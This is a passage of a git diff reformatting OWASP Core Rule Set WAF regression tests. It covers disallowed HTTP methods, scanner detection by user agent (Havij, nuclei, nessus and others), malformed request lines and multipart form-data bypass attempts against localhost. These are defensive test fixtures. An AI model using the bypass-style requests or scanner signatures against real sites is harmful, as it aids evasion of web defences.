input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: "id \"911100\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "OPTIONS" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/options" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "OPTIONS" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/options" + version: "HTTP/1.1" + output: + no_log_contains: "id \"911100\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "HEAD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/head" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-4 + - input: + dest_addr: "127.0.0.1" + method: "HEAD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/head" + version: "HTTP/1.1" + output: + no_log_contains: "id \"911100\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "test=value" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "test=value" + version: "HTTP/1.1" + output: + no_log_contains: "id \"911100\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "TEST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/test" - version: "HTTP/1.1" - output: - log_contains: "id \"911100\"" - - test_title: 911100-6 + - input: + dest_addr: "127.0.0.1" + method: "TEST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/test" + version: "HTTP/1.1" + output: + log_contains: "id \"911100\"" + - test_id: 6 desc: Method is not allowed by policy (911100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: DELETE - port: 80 - uri: "/delete" - version: HTTP/1.0 - output: - log_contains: id "911100" - - test_title: 911100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: DELETE + port: 80 + uri: "/delete" + version: HTTP/1.0 + output: + log_contains: id "911100" + - test_id: 7 desc: Method is not allowed by policy (911100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: FOO - port: 80 - uri: "/foo" - version: HTTP/1.0 - output: - log_contains: id "911100" - - test_title: 911100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: FOO + port: 80 + uri: "/foo" + version: HTTP/1.0 + output: + log_contains: id "911100" + - test_id: 8 desc: Method is not allowed by policy (911100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: SUBSCRIBE - port: 80 - uri: "/subscribe" - version: HTTP/1.0 - output: - log_contains: id "911100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: SUBSCRIBE + port: 80 + uri: "/subscribe" + version: HTTP/1.0 + output: + log_contains: id "911100" diff --git a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml index 0ba29d89d..eec82c958 100644 --- a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml +++ b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml @@ -2,130 +2,121 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 913100.yaml tests: - - test_title: 913100-1 + - test_id: 1 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "913100" - - test_title: 913100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "913100" + - test_id: 2 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: Arachni/0.2.1 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "913100" - - test_title: 913100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: Arachni/0.2.1 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "913100" + - test_id: 3 desc: Request Indicates a Security Scanner Scanned the Site (913100) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: nuclei - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "913100" - - test_title: 913100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: nuclei + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "913100" + - test_id: 4 desc: "Scanner identification based on User-agent field" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "nessus" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "913100" - - test_title: 913100-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "nessus" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "913100" + - test_id: 5 desc: "YUM package manager allow list" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "urlgrabber/3.10 yum/3.4.3" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "913100" - - test_title: 913100-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "urlgrabber/3.10 yum/3.4.3" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "913100" + - test_id: 6 desc: "ZGrab" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "Mozilla/5.0 zgrab/0.x" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "913100" - - test_title: 913100-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "Mozilla/5.0 zgrab/0.x" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "913100" + - test_id: 7 desc: "eCairn allow list" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "mozilla/5.0 ecairn-grabber/1.0 (+http://ecairn.com/grabber)" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "913100" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "mozilla/5.0 ecairn-grabber/1.0 (+http://ecairn.com/grabber)" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "913100" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml index 88109fb8d..01a8b318e 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml @@ -1,276 +1,259 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920100.yaml" description: "Tests to trigger, or not trigger 920100" +rule_id: 920100 tests: - - test_title: 920100-1 + - test_id: 1 desc: Standard GET request stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920100\"" + - test_id: 2 desc: | Request has tab (\t) before request method - Apache complains AH00126: Invalid URI in request GET / HTTP/1.1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: " GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - status: 400 - - test_title: 920100-3 + - input: + dest_addr: "127.0.0.1" + method: " GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 3 desc: Perfectly valid OPTIONS request stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "*" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-4 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "*" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920100\"" + - test_id: 4 desc: Valid CONNECT stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "CONNECT" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "1.2.3.4:80" - version: "HTTP/1.1" - output: - status: 200 - no_log_contains: "id \"920100\"" - - test_title: 920100-5 + - input: + dest_addr: "127.0.0.1" + method: "CONNECT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "1.2.3.4:80" + version: "HTTP/1.1" + output: + status: 200 + no_log_contains: "id \"920100\"" + - test_id: 5 desc: invalid Connect request, domains require ports stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "CONNECT" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "www.coreruleset.org" - version: "HTTP/1.1" - output: - status: 400 - - test_title: 920100-6 + - input: + dest_addr: "127.0.0.1" + method: "CONNECT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "www.coreruleset.org" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 6 desc: This is an acceptable CONNECT request for SSL tunneling stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "CONNECT" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "www.coreruleset.org:80" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-7 + - input: + dest_addr: "127.0.0.1" + method: "CONNECT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "www.coreruleset.org:80" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920100\"" + - test_id: 7 desc: Valid request with query and anchor components stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/index.html?I=Like&Apples=Today#tag" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/index.html?I=Like&Apples=Today#tag" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920100\"" + - test_id: 8 desc: | The colon in the path is not allowed. Apache will block by default (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/index.html:80?I=Like&Apples=Today#tag" - version: "HTTP/1.1" - output: - status: 400 - - test_title: 920100-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/index.html:80?I=Like&Apples=Today#tag" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 9 desc: Normal Options request with path stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-10 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920100\"" + - test_id: 10 desc: An invalid method with a long name stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "REALLYLONGUNREALMETHOD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920100\"" - - test_title: 920100-11 + - input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920100\"" + - test_id: 11 desc: | An invalid request because a backslash is used in uri Apache will end up blocking this before it gets to CRS. We will need to support OR output tests to fix this stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "\\" - version: "HTTP/1.1" - output: - status: 400 - - test_title: 920100-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "\\" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 12 desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: "\tGET" - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - status: 400 - - test_title: 920100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: " GET" + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + status: 400 + - test_id: 13 desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: \index.html - version: HTTP\1.0 - output: - status: 400 - - test_title: 920100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: \index.html + version: HTTP\1.0 + output: + status: 400 + - test_id: 14 desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: '|GET' - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "920100" - - test_title: 920100-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: '|GET' + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "920100" + - test_id: 15 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - status: 400 - - test_title: 920100-16 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + status: 400 + - test_id: 16 desc: "Status Page Test - Invalid HTTP request line: URI has scheme and authority but no path" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "http://localhost" - version: "HTTP/1.1" - output: - log_contains: "id \"920100\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "http://localhost" + version: "HTTP/1.1" + output: + log_contains: "id \"920100\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml index 848cebe9b..63709a82c 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml @@ -1,966 +1,926 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920120.yaml" description: "Tests to trigger rule 920120" +rule_id: 920120 tests: - - test_title: 920120-1 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en" - Connection: "close" - Referer: "http://localhost/" - Content-Type: "multipart/form-data; boundary=--------397236876" - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="file=.txt" - Content-Type: text/plain - - 555-555-0199@example.com - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-2 + - test_id: 1 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en" + Connection: "close" + Referer: "http://localhost/" + Content-Type: "multipart/form-data; boundary=--------397236876" + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="file=.txt" + Content-Type: text/plain + + 555-555-0199@example.com + ----------397236876-- + version: "HTTP/1.1" + output: + log_contains: id "920120" + - test_id: 2 desc: Attempted multipart/form-data bypass (920120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: gzip, deflate - Accept-Language: en-us,en;q=0.5 - Connection: keep-alive - Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: /cgi-bin/fup.cgi - version: HTTP/1.1 - data: | - -----------------------------627652292512397580456702590 - Content-Disposition: form-data; name="fi=le"; filename="test" - Content-Type: text/plain + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: gzip, deflate + Accept-Language: en-us,en;q=0.5 + Connection: keep-alive + Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: /cgi-bin/fup.cgi + version: HTTP/1.1 + data: | + -----------------------------627652292512397580456702590 + Content-Disposition: form-data; name="fi=le"; filename="test" + Content-Type: text/plain email: security@example.com - -----------------------------627652292512397580456702590 - Content-Disposition: form-data; name="note" + -----------------------------627652292512397580456702590 + Content-Disposition: form-data; name="note" - Contact info. - -----------------------------627652292512397580456702590-- - output: - log_contains: id "920120" - - test_title: 920120-3 + Contact info. + -----------------------------627652292512397580456702590-- + output: + log_contains: id "920120" + - test_id: 3 desc: Invalid Request Body (920120) from old 